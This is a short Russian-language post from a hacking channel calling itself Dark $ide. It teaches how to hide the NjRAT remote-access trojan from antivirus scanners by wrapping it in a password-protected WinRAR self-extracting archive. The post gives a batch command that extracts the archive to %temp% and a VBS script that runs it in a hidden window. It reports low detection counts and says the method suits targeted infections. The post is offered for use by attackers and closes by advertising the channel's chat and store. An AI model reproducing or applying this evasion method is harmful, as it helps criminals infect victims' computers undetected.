April 8, 2019
Делаем semi-FUD scantime при помощи WinRar {Вирусология}
https://tele.click/darkside_team
Привет хацкеры, сегодня покажу вам дедовский способ скрытия вируса от АВ при помощи WinRar.
Я буду "прятать" обычный NjRAT. Для начала добавим наш файл в архив с такими параметрами:
Далее: дополнительно -> параметры SFX:
%temp%
Вкладка Установка:
Режимы:
Обновление:
И добавляем пароль к архиву, мой: FuckAV
Теперь рядом с архивом создаём файл start.bat с таким содержимым:
t.sfx.exe -pFuckAV -d%temp%
t.sfx.exe - имя ВАШЕГО файла. -pFuckAV - пароль от архива.-d%temp% - директория распаковки архива.
Тут же создаём файл vstart.vbs с таким содержимым:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "start.bat", 0, false
Теперь добаляем t.sfx.exe, start.bat, vstart.vbs в архив с такими параметрами:
Остальное как в начале статьи.
Юзер появился, значит всё работает.
Детекты:
https://antiscan.me/scan/new/result?id=RxGcRDzK5tO0
Этот способ очень древний и подойдёт только для целевых заражений.
Минусы:
- Зависимость от WinRar (без него не запустится)
- Только ScanTime, на Рантайм не работает
- Добавляет вес файлу
Плюсы:
- Детект ~ 2
- Можно дополнительно склеить файлы
- Подойдёт для любых вирусов
Dark $ide - Твоя Тёмная Сторона
Наш чат - Dark Chat | D$
Наш магазин - Dark $tore
